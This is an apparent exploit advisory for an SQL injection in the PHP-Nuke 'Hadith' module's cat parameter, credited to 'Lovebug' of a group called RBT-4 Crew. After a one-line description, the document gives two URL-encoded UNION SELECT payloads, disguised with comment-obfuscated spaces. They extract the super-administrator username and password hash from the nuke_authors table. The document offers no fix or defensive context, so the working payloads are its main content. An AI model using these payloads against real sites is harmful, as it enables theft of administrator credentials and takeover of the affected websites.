The PHP-Nuke Hadith module suffers from a SQL injection vulnerability.
ad28e0f05cbb142c3f7a9f2bbb3e2537b06f9a27be5518de92336f495a7e1c0e
R B T - 4 C R E W www.rbt-4.net
-----------------------------------------------
AUTHOR : Lovebug
PHP-Nuke Module "Hadith" [cat] Sql injection
Original Advisory:
http://www.rbt-4.net/forum/viewthread.php?forum_id=51&thread_id=3078
Exploit
-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A